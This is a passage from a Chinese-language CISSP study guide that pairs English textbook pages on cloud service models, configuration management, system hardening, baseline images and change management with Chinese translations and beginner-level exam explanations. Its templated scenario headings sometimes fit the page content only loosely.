这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

指南:指南是建议做法,不一定强制。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Recommended、not compulsory 常对应 guideline。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 23 / PDF P1109

第 1109 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

three primary cloud service models. Refer to it as you read through the following bullets. FIGURE 16.1 Cloud shared responsibility model Software as a Service (SaaS) Software as a service (SaaS) models provide fully functional enterprise applications typically accessible via a web browser. For example, Google's Gmail is a SaaS application. The vendor (Google in this example) is responsible for all maintenance of the SaaS services. SaaS comes with shared responsibilities for data and applications. Customers may make configuration changes to their Gmail accounts. Customers also share responsibility for the data they keep and transmit via their Gmail accounts.

Platform as a Service (PaaS) Platform as a service (PaaS) models provide consumers with a computing platform, including hardware, operating systems, and a runtime environment. The runtime environment includes programming languages, libraries, services, and other tools supported by the vendor. Customers deploy applications that they've created or acquired, manage their applications, and possibly modify some configuration settings on the host. However, the vendor is responsible for maintenance of the host and the underlying cloud infrastructure. Infrastructure as a Service (IaaS) Infrastructure as a service (IaaS) models provide basic computing resources to customers.

This includes servers, storage, and networking resources. Customers install operating systems and applications and perform all required maintenance on the

中文直译 / 整理

三种主要云服务模型中的维护和安全责任分工。 请在阅读以下要点时参考此 图。 图 16.1云共享责任模型 软件即服务 (SaaS) 软件即服务(SaaS) 模型提供完全功能的企业应用程序,通 常可通过网页浏览器访问。 例如,谷歌的 Gmail 就是一个 SaaS 应用程序。 供 应商(在此示例中为谷歌)负责 SaaS 服务的所有维护工作。 SaaS 涉及数据和 应用程序的共同责任。 客户可以对其 Gmail 账户进行配置更改。 客户还对其通 过 Gmail 账户存储和传输的数据负有责任。 平台即服务 (PaaS) 平台即服务(PaaS) 模型为用户提供一个计算平台,包括硬件、 操作系统和运行时环境。 运行时环境包括供应商支持的编程语言、库、服务及其 他工具。 客户部署自己创建或获取的应用程序,管理其应用程序,并可能修改主 机上的某些配置设置。 然而,供应商负责主机及底层云基础设施的维护。 基础设施即服务 (IaaS) 基础设施即服务(IaaS)模型为客户提供基本的计 算资源,包括服务器、存储和网络资源。 客户安装操作系统和应用程序, 并对

小白解释

场景先行:你是公司的安全负责人,正在读第 1109 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1109 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
学习单元 24 / PDF P1110

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

operating systems and applications. The vendor maintains the cloud-based infrastructure, ensuring that consumers have access to leased systems. NIST SP 800-145—The NIST Definition of Cloud Computing, provides standard definitions for many cloud-based services. This includes definitions for service models (SaaS, PaaS, and IaaS), and definitions for deployment models (public, private, community, and hybrid). NIST SP 800-144—Guidelines on Security and Privacy in Public Cloud Computing, provides in-depth details on security issues related to cloud computing. The cloud deployment model also affects the breakdown of responsibilities of the cloud-based assets.

The four cloud deployment models available are as follows: A public cloud model includes assets available for any consumers to rent or lease and is hosted by an external CSP. Service-level agreements can effectively ensure that the CSP provides the cloud-based services at a level acceptable to the organization. The private cloud deployment model is used for cloud-based assets for a single organization. Organizations can create and host private clouds using their own on-premises resources. If so, the organization is responsible for all maintenance. However, an organization can also rent resources from a third party for exclusive use of the organization.

Maintenance requirements are typically split based on the service model (SaaS, PaaS, or IaaS). A community cloud deployment model provides cloud-based assets to two or more organizations that have a shared concern, such as a similar mission, security requirements, policy, or compliance considerations. Assets can be owned and managed by one or more of the organizations. Maintenance responsibilities are shared based on who is hosting the assets and the service models. A hybrid cloud model includes a combination of two or more clouds that are bound together by a technology that provides data and application portability. Similar to a community cloud model, maintenance

中文直译 / 整理

操作系统和应用程序进行所有必要的维护。 供应商维护基于云的基础设施,确保 消费者能够访问租赁的系统。 NISTSP800-145—云计算的NIST定义提供了许多基于云服务的标准 定义。 这包括服务模型(SaaS、PaaS和IaaS)的定义,以及部署模型 (公有、私有、社区和混合)的定义。 NISTSP800-144—公有云计算中 的安全与隐私指南提供了关于云计算安全问题的详细信息。 云部署模型还影响云资产责任的划分。 可用的四种云部署模型如下: 公有云模型包括可供任何消费者租用或租赁的资产,并由外部云服务提供 商(CSP)托管。 服务等级协议可有效确保CSP提供的云服务达到组织可 接受的水平。 私有云部署模型用于单一组织的云资产。 组织可以使用其自身的本地资源 创建和托管私有云。 如果是这样,组织需负责所有维护工作。 然而,组织 也可以从第三方租用资源,仅供本组织独家使用。 维护要求通常根据服务 模型(SaaS、PaaS或IaaS)进行划分。 一个 社区云 部署模型为两个或多个具有共同关注点的组织提供基于云的 资源,例如相似的使命、安全要求、政策或合规考虑。 这些资源可由一 个或多个组织拥有和管理。

维护责任根据资源的托管方和服务模型进行 分担。 一种 混合云 模型包括两种或多种云的组合,这些云通过提供数据和应用程 序可移植性的技术绑定在一起。 与社区云模型类似,维护

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

指南:指南是建议做法,不一定强制。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 25 / PDF P1111

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

responsibilities are shared based on who is hosting the assets and the service models in use. Anything as a Service (XaaS) Anything as a service (XaaS) is the catchall term to refer to any type of computing service or capability that can be provided to customers through or over a cloud solution. Many service providers that are rolling out new offerings to their clientele are more often hosting the technology in a cloud solution rather than on-premises equipment. This can enable rapid expansion, scalability, high availability, and more when compared to the previous means of deployment.

One area of growth in XaaS is security as a service (SECaaS), where various forms of security services are being offered through cloud solutions, including backup, authentication, authorization, auditing/accounting, antimalware, storage, SIEM, IDS/IPS analysis, and monitoring as a service (MaaS). An SECaaS is also referred to as a managed service provider (MSP) or a managed security service provider (MSSP). MSPs and MSSPs are third-party (often cloud-based) services that provide remote oversight and management of on-premises IT or cloud IT.

Some MSPs/MSSPs are general purpose, some focus on specific IT areas (e.g., backup, security, storage, firewall), and others are vertical management focused (e.g., legal, medical, financial, government). Scalability and Elasticity Scalability refers to the ability of a system to handle additional workloads by adding additional resources. As an example, imagine a server has 16 GB of random access memory (RAM), but it can support 64 GB of RAM. It's possible to shut down the server and add additional RAM to scale it up. Elasticity refers to a system's ability to add and remove resources dynamically, based on increasing or decreasing load.

As an example, imagine an e-commerce server with 16 GB of RAM and a four-core processor. Marketing launches an excellent advertising campaign along with a sale. Suddenly, the server is overwhelmed with traffic. A cloud provider that supports elasticity can dynamically add more RAM and processors to meet

中文直译 / 整理

责任根据资产的托管方和所使用的服务模型进行分担。 一切即服务(XaaS) 一切即服务(XaaS)是一个统称,用于指代任何可通过云解决方案提供给 客户的计算服务或能力。 许多推出新服务的供应商更倾向于将技术托管在云 解决方案中,而非本地设备上。 与以往的部署方式相比,这能够实现更快的 扩展、可扩展性、高可用性等优势。 XaaS的一个增长领域是安全即服务(SECaaS),其中各种形式的安全服 务通过云解决方案提供,包括备份、身份验证、授权、审计/计费、反恶 意软件、存储、SIEM、IDS/IPS分析以及监控即服务(MaaS)。 SECaaS也被称为托管服务提供商(MSP)或托管安全服务提供商( MSSP)。 MSP和MSSP是第三方(通常是基于云的)服务,提供对本地IT或云IT的 远程监督与管理。 一些MSP/MSSP是通用型的,一些专注于特定的IT领域 (例如备份、安全、存储、防火墙),另一些则专注于垂直领域管理(例如 法律、医疗、金融、政府)。 可扩展性与弹性 可扩展性是指系统通过添加额外资源来处理额外工作负载的能力。 例如,假设 一台服务器具有16 GB的随机存取存储器(RAM),但它支持64 GB的RA M。

可以关闭服务器并添加额外的RAM以进行扩展。 弹性是指系统根据负载的增加或减少动态添加和删除资源的能力。 例如,想象 一台配备16 GB内存和四核处理器的电子商务服务器。 市场营销部门推出了一 项出色的广告活动并进行促销。 突然间,服务器流量激增。 支持弹性的云提供 商可以动态增加内存和处理器以满足

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 26 / PDF P1112

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

the increased workload. When the sale ends and the workload decreases, the cloud provider can dynamically remove the additional resources. Chapter 9 covers virtualization concepts. Virtualization technologies commonly support elasticity, too. A key point is that elasticity methods don't require shutting a system down to add the resources. The resources are automatically added or removed to match the demand. In contrast, scalability methods are not typically automatic or dynamic, though they can be designed for automatic scalability (horizontal and vertical scaling).

They are usually set up for manual scalability, which requires manual intervention to add additional resources, such as an administrator shutting down a system to add more RAM. Although the examples mention RAM and processor resources, scalability and elasticity methods can extend a system's capability by adding other resources. This includes adding more bandwidth, disk space, or even more servers. Services Integration Services integration, cloud integration, systems integration, and integration platform as a service (iPaaS) is the design and architecture of an IT/IS solution that stitches together elements from on-premises and cloud sources into a seamless productive environment.

The goals of services integration are to eliminate data silos (a situation where data is contained in one area and thus inaccessible to other applications or business units), expand access, clarify processing visibility, and improve functional connectivity of on-site and off-site resources. This can also be viewed as an example of a software-defined data center (SDDC). Serverless Architecture Serverless architecture is a cloud computing concept where code is managed by the customer and the platform (i.e., supporting hardware and software) or server is managed by the cloud service provider (CSP). There is always a physical server running the code, but this execution model allows the

中文直译 / 整理

增加的工作负载。 当促销结束且工作负载减少时,云提供商可以动态移除额外的 资源。 第9章涵盖虚拟化概念。 虚拟化技术通常也支持弹性。 一个关键点是,弹性方法无需关闭系统即可添加资源。 资源会自动增加或减少 以匹配需求。 相比之下,可扩展性方法通常不是自动或动态的,尽管它们可以 设计为自动可扩展(水平扩展和垂直扩展)。 它们通常设置为手动可扩展,这 需要人工干预来添加额外资源,例如管理员关闭系统以增加更多内存。 尽管示例中提到了内存和处理器资源,但可扩展性和弹性方法可以通过添加 其他资源来扩展系统的功能。 这包括增加更多带宽、磁盘空间,甚至更多服 务器。 服务集成 服务集成、云集成、系统集成和集成平台即服务(iPaaS)是指设计和架构 一种IT/IS解决方案,将本地和云来源的组件整合为一个无缝的高效环境。 服务集成的目标是消除数据孤岛(数据被限制在某一区域,从而无法被其 他应用程序或业务单元访问)、扩大访问范围、明确处理可见性,并改善 本地和远程资源的功能连接性。 这也可以被视为软件定义数据中心( SDDC)的一个示例。

无服务器架构 无服务器架构 是一种云计算概念,在这种概念中,代码由客户管理,而平台 (即支持的硬件和软件)或服务器由云服务提供商(CSP)管理。 始终存在一 台物理服务器在运行代码,但这种执行模型允许

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 27 / PDF P1113

第 1113 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

software designer/architect/programmer/developer to focus on the logic of their code and not have to be concerned about the parameters or limitations of a specific server. This is also known as function as a service (FaaS). Applications developed on serverless architecture are similar to microservices, and each function is crafted to operate independently and autonomously. This allows each function to be independently scaled by the cloud service provider (CSP). This is distinct from PaaS, where an entire execution environment or platform is spun up to host an application, and it is always running, consuming resources and racking up costs, even when it is not actively being used.

With serverless architecture or FaaS, the functions run only when called and then terminate when their operations are completed, thus minimizing costs. Perform Configuration Management (CM) Configuration management (CM) helps ensure that systems are deployed in a secure, consistent state and that they stay in a secure, consistent state throughout their lifetime. Baselines and images are commonly used to deploy systems. Provisioning Provisioning new systems refers to installing and configuring the operating system and needed applications. Deploying operating systems and applications using all of the defaults typically enables many vulnerabilities.

Instead, new systems should be configured to reduce the vulnerabilities. A key consideration when provisioning a system is to harden it based on its use. Hardening a system makes it more secure than the default configuration and includes the following: Disable all unused services. As an example, a file server needs services that allow users to access files, but file servers rarely use FTP. If the server is not using FTP, it should be disabled. Close all unused logical ports. These are often closed by disabling unused services. Remove all unused applications. Some applications automatically add additional applications. If these aren't used, they should be removed.

中文直译 / 整理

软件设计者/架构师/程序员/开发者专注于其代码的逻辑,而无需关心特定服 务器的参数或限制。 这也被称为 函数即服务(FaaS)。 在无服务器架构上开发的应用程序类似于微服务,每个函数都设计为独立且自 主运行。 这使得云服务提供商(CSP)能够独立扩展每个函数。 这与PaaS不同, 在PaaS中,整个执行环境或平台会被启动以托管应用程序,并且即使未被主动 使用,也会持续运行、消耗资源并产生费用。 而在无服务器架构或FaaS中,函 数仅在被调用时运行,并在操作完成后终止,从而最小化成本。 执行配置管理(CM) 配置管理(CM)有助于确保系统以安全、一致的状态部署,并在整个生命周期 内保持这种安全、一致的状态。 基线和镜像通常用于部署系统。 预配 预配新系统是指安装和配置操作系统及所需应用程序。 使用所有默认设置部 署操作系统和应用程序通常会启用许多漏洞。 相反,新系统应进行配置以减 少漏洞。 在配置系统时,一个关键的考虑因素是根据其用途进行加固。 系统加固使其安 全性高于默认配置,包括以下内容: 禁用所有未使用的服务。 例如,文件服务器需要允许用户访问文件的服务, 但文件服务器很少使用FTP。

如果服务器未使用FTP,则应将其禁用。 关闭所有未使用的逻辑端口。 这些端口通常通过禁用未使用的服务来关闭。 移除所有未使用的应用程序。 某些应用程序会自动添加额外的应用程序。 如果这些应用程序未被使用,则应将其移除。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1113 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 28 / PDF P1114

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Change default passwords. Many applications have default passwords for some accounts. Attackers know these, so the passwords should be changed. Baselining A baseline is a starting point. In the context of configuration management, it is the starting configuration for a system. An easy way to think of a baseline is as a list of settings. An operating system baseline identifies all the settings to harden specific systems. For example, a baseline for a file server identifies the configuration settings to harden the file server. Desktop computers would have a different baseline.

Although baselines provide a starting point, administrators often modify them as needed for different systems within their organization. Using Images for Baselining Many organizations use images to deploy baselines. Figure 16.2 shows the process of creating and deploying baseline images in an overall three-step process. Here are the steps: In practice, more details are involved in this process, depending on the tools used for imaging. For example, the steps to capture and deploy images using one product are different from the steps to capture and deploy images using another product. 1.

An administrator starts by installing the operating system and all desired applications on a computer (labeled as the baseline system in the figure). The administrator then configures the system with relevant security and other settings to meet the organization's needs. Personnel then perform extensive testing to ensure that the system operates as expected before proceeding to the next step.

中文直译 / 整理

更改默认密码。 许多应用程序为某些账户设置了默认密码,攻击者知晓这 些密码,因此应更改密码。 基线设置 一个 基线 是一个起点。 在配置管理的背景下,它是系统的初始配置。 将基线理 解为一组设置列表是一种简单的方式。 操作系统基线标识了强化特定系统所需 的所有设置。 例如,文件服务器的基线会标识用于强化文件服务器的配置设置。 桌面计算机则会有不同的基线。 尽管基线提供了起点,但管理员通常会根据组 织内不同系统的需求对其进行修改。 使用映像进行基线设置 许多组织使用映像来部署基线。 图 16.2展示了在整体三步流程中创建和部 署基线映像的过程。 步骤如下: 在实际操作中,此过程涉及更多细节,具体取决于所使用的成像工具。 例如,使用一种产品捕获和部署映像的步骤与使用另一种产品捕获和部署 映像的步骤不同。 1. 管理员首先在一台计算机上安装操作系统和所有所需的应用程序(图中标 记为基线系统)。 然后,管理员配置系统,设置相关的安全和其他参数以满 足组织的需求。 随后,相关人员进行广泛测试,确保系统在进入下一步之前 能够正常运行。

小白解释

场景先行:你是公司的安全负责人,正在读第 1114 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
学习单元 29 / PDF P1115

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

FIGURE 16.2 Creating and deploying images 2. Next, the administrator captures an image of the system using imaging software and stores it on a server (labeled as an Image Server in Figure 16.2). It's also possible to store images on external hard drives, USB drives, or DVDs. 3. Personnel then deploy the image to systems as needed. These systems often require additional configuration to finalize them, such as giving them unique names. However, the overall configuration of these systems is the same as the baseline system. Baseline images improve the security of systems by ensuring that desired security settings are always configured correctly.

Additionally, they reduce the amount of time required to deploy and maintain systems, thus reducing the overall maintenance costs. Deployment of a prebuilt image can require only a few minutes of a technician's time. If a user's system is corrupted, technicians can redeploy an image in minutes, instead of taking hours to troubleshoot the system or trying to rebuild it from scratch. Organizations typically protect the baseline images to ensure that they aren't modified. In a worst-case scenario, malware can be injected into an image and

中文直译 / 整理

图 16.2 创建和部署映像 2. 接下来,管理员使用映像软件捕获系统映像并将其存储在服务器上(在图 16.2中标记为映像服务器)。 也可以将映像存储在外部硬盘驱动器、USB 驱动 器上 , 或 DVD 上。 3. 然后,人员根据需要将映像部署到系统中。 这些系统通常需要进行额外配置以 完成设置,例如为其分配 唯一的名称。 然而,这些系统的整体配置与基线系统相同。 基线映像通过确保所需的安全设置始终正确配置,从而提高系统的安全性。 此 外,它们减少了部署和维护系统所需的时间,从而降低了总体维护成本。 部署 预构建的映像可能仅需技术人员几分钟的时间。 如果用户的系统损坏,技术人 员可以在几分钟内重新部署映像,而不是花费数小时来排查系统问题或尝试从 头重建系统。 组织通常会保护基础镜像,以确保它们不会被修改。 在最坏的情况下,恶意软件可 能被注入到镜像中并

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 30 / PDF P1116

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

then deployed to systems within the network. Automation It's common to combine imaging with other automated methods for baselines. In other words, administrators can create one image for all desktop computers within an organization. They then use automated methods to add additional applications, features, or settings for specific groups of computers. For example, computers in one department may have additional security settings or applications applied through scripting or other automated tools. Microsoft's operating systems include Group Policy. Administrators can configure a Group Policy setting one time and automatically have the setting apply to all the computers in the domain.

Other Group Policy settings can be configured to apply to all computers in a group, such as all file servers or all the accounting department's computers. It's becoming common to make registry changes for some Windows systems. As an example, attackers are using PowerShell in offensive attacks quite often. Chapter 14 discusses PowerShell's use in privilege escalation attacks. By modifying some registry settings, administrators limit these attacks’ effectiveness and detect them when they start. Some settings prevent an attacker from accessing PowerShell, and other settings enable additional logging so that administrators can see what the attackers are doing with PowerShell.

Administrators can manipulate Group Policy settings to modify the appropriate registry settings. Manage Change Deploying systems in a secure state is a good start. However, it's also essential to ensure that systems retain that same level of security. Change management helps reduce unanticipated outages caused by unauthorized changes. The primary goal of change management is to ensure that changes do not cause outages. Change management processes ensure that appropriate personnel review and approve changes before implementation and ensure that personnel test and document the changes. Changes often create unintended side effects that can cause outages.

For example, an administrator can change one system to resolve a problem but unknowingly cause a problem in other systems. Consider Figure 16.3. The

中文直译 / 整理

